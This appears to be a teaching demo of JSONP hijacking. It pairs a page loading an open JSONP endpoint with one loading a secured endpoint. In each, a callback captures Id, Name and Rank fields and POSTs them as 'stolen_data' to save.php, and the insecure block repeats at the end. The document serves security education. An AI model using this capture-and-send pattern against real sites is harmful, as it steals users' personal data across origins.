yehgdotnet/Insecure Example

## Insecure Example
<!-- -->
<script>
function SavetoServer(data){
  var xhttp = new XMLHttpRequest();
  xhttp.open("POST", "save.php", true);
  xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xhttp.send(data);
}

function parseResponse(s){
stolen_data = "id=" + s['Id'] + "&name=" + s['Name'] + '&rank=' + s['Rank'];
document.write("Id:"    + s['Id'] + "<br>");
document.write("Name: " + s['Name'] + "<br>");
document.write("Rank: " + s['Rank'] + "<br>");
SavetoServer(stolen_data);
}
</script>

<script label="OPEN JSON Endpoint" src="https://cybersecurityassessor.ninja/poc/jsonp_data.php">
</script>


## Secure Example
<script>
function SavetoServer(data){
  var xhttp = new XMLHttpRequest();
  xhttp.open("POST", "save.php", true);
  xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xhttp.send(data);
}

function parseResponse(s){
stolen_data = "id=" + s['Id'] + "&name=" + s['Name'] + '&rank=' + s['Rank'];
document.write("Id:"    + s['Id'] + "<br>");
document.write("Name: " + s['Name'] + "<br>");
document.write("Rank: " + s['Rank'] + "<br>");
SavetoServer(stolen_data);
}
</script>

<script label="SECURE JSON Endpoint" src="https://cybersecurityassessor.ninja/poc/jsonp_data_secured.php">
</script>
	<!-- -->
	<script>
	function SavetoServer(data){
	var xhttp = new XMLHttpRequest();
	xhttp.open("POST", "save.php", true);
	xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	xhttp.send(data);
	}

	function parseResponse(s){
	stolen_data = "id=" + s['Id'] + "&name=" + s['Name'] + '&rank=' + s['Rank'];
	document.write("Id:" + s['Id'] + "<br>");
	document.write("Name: " + s['Name'] + "<br>");
	document.write("Rank: " + s['Rank'] + "<br>");
	SavetoServer(stolen_data);
	}
	</script>

	<script label="OPEN JSON Endpoint" src="https://cybersecurityassessor.ninja/poc/jsonp_data.php">
	</script>